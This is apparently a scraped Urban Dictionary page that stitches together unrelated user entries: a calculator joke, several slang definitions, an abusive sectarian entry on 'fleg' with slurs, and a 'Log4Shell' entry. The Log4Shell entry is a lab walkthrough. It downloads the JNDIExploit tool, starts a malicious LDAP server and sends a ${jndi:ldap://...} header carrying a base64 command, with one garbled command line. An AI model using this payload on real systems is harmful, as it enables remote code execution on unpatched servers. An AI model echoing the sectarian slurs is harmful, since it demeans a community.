Skip to main content

0%÷root(∛√(1÷789), log(log2(atan(acos(asin(456!)))×e×123+asinh(acosh(atanh(π×0.0484041570)))))) 

You went to the calculator app on a apple device and went to scientific mode and just pressed every button left to right
I am so 0%÷root(∛√(1÷789), log(log2(atan(acos(asin(456!)))×e×123+asinh(acosh(atanh(π×0.0484041570))))))

Log4Shell 

The Java Naming and Directory Interface (JNDI) allows for lookup of Java objects at program runtime given a path to their data. JNDI can leverage several directory interfaces, each providing a different scheme of looking up files. Among these interfaces is the Lightweight Directory Access Protocol (LDAP), a non-Java-specific protocol which retrieves the object data as a URL from an appropriate server, either local or anywhere on the Internet.

In the default configuration, when logging a string, Log4j 2 performs string substitution on expressions of the form ${prefix:name}. For example, Text: ${java:version} might be converted to Text: Java version 1.7.0_67. Among the recognized expressions is ${jndi:<lookup>}; by specifying the lookup to be through LDAP, an arbitrary URL may be queried and loaded as Java object data. ${jndi:ldap://example.com/file}, for example, will load data from that URL if connected to the Internet. By inputting a string that is logged, an attacker can load and execute malicious code hosted on a public URL. Even if execution of the data is disabled, an attacker can still retrieve data—such as secret environment variables—by placing them in the URL, in which they will be substituted and sent to the attacker's server. Besides LDAP, other potentially exploitable JNDI lookup protocols include its secure variant LDAPS, Java Remote Method Invocation (RMI), the Domain Name System (DNS), and the Internet Inter-ORB Protocol (IIOP).
To execute commands with Log4Shell, I’ll be spinning up an LDAP server with the capabilities to exploit JNDI injection attacks written by feihong-cs. Run the following to download the malicious LDAP server:

cd /tmp
wget --quiet github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zipunzip JNDIExploit.v1.2.zip

With the ZIP archive decompressed, we can retrieve the programs help menu with the following command:

java -jar JNDIExploit-1.2-SNAPSHOT.jar -h

To start the malicious LDAP server on localhost:1389 (there will also be an HTTP server spun up on port 9001. Looking at the source code tells me that this is where the actual malicious Java class is being loaded from), run the following command:

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 127.0.0.1 -p 9001

And finally, to obtain our reverse shell, let’s base64 encode a echo command to write some data into a file in the /tmp folder (make sure to get rid of the + sign by adding extra spaces as needed):

echo -n 'echo "you have been pwned" > /tmp/note.txt' | base64 -w 0

And then make the following request to the vulnerable application:

curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://127.0.0.1:1389/Basic/Command/Base64/ZWNobyAieW91IGhhdmUgYmVlbiBwd25lZCIgPiAvdG1wL25vdGUudHh0}'

We can then confirm that the command was executed by going into the container with docker exec -it log4shell-app sh and then confirm that the file note.txt was created in the /tmp folder:
Log4Shell by Bad C dev December 15, 2021
The word 'flag' as pronounced by people with thick Belfast accents. The term is a perfect encapsulation of the disproportionate and overblown reaction to the removal of the Union Jack (as in 'de fleg') from above City Hall in Belfast. Where previously it had flown for 365 days per year, it is now flown on 17 designated days of the year - in line with many other British cities.

The event caused a portion of the Protestant community ('fleggers') to make international pricks of themselves as they proceeded to wreck the fucking place, claiming it was another erosion of a 'British' identity they perceive to have been under attack since the horrifying spectre of equality reared its head in Northern Ireland.

The word 'fleg' - and indeed 'fleggers' - fittingly describes a section of humanity unconcerned with knowledge, reality or the vagaries of the English language. Like America's tea-baggers they are ruled by instinct, fear and paranoia with a side dish of rampant bigotry and startling ignorance of the world around them.
"Wat de fuck like! The taigs got de fleg took down! Let's wreck de fuckin place! No surrender!"

"De fleg has been took down! Before ye know it there'll be a united Ireland! Attack Short Strand! God Save The Queen!"
Fleg by OnionFleg August 9, 2013
Word of the Day on July 18, 2026
To take something small, that doesn't quite qualify as a theft. Probably from the Danish "skæv" or the Dutch "scheef", both of which are pronounced similarly, meaning "askew, or not quite right'. To change an item's ownership without permission, but only something small and of little worth.
"I skeefed an apple off the neighbor's tree." "I skeefed some chips outta your bag when you looked away." "Don't skeef my chair when I go to the bathroom."
Skeef by kachinaflonk July 16, 2026
Word of the Day on July 17, 2026

Hair spider

A tight, tangled knot of loose hair and lint that forms inside clothing during the clothes dryer cycle. It typically hides inside garments, causing an annoying lump or a phantom tickling sensation against the skin until it is found or falls out onto the floor during folding.
I was folding my clothes and a huge hair spider fell out onto my hand
Hair spider by Kmorsels July 15, 2026
Word of the Day on July 16, 2026
n. A screenshot fabricated by a company to misrepresent the graphics of a game; a combination of the words bullshit and screenshot.

Originated from Penny Arcade, a popular gaming webcomic.
-Have you seen Madden 2006 for the Xbox 360? The graphics are gonna be awesome!
-Dude, the Madden 2006 images they showed at E3 were bullshots. It doesn't look nearly as good as they said.
bullshot by Worker Unit #503,298,545 September 26, 2005
Word of the Day on July 15, 2026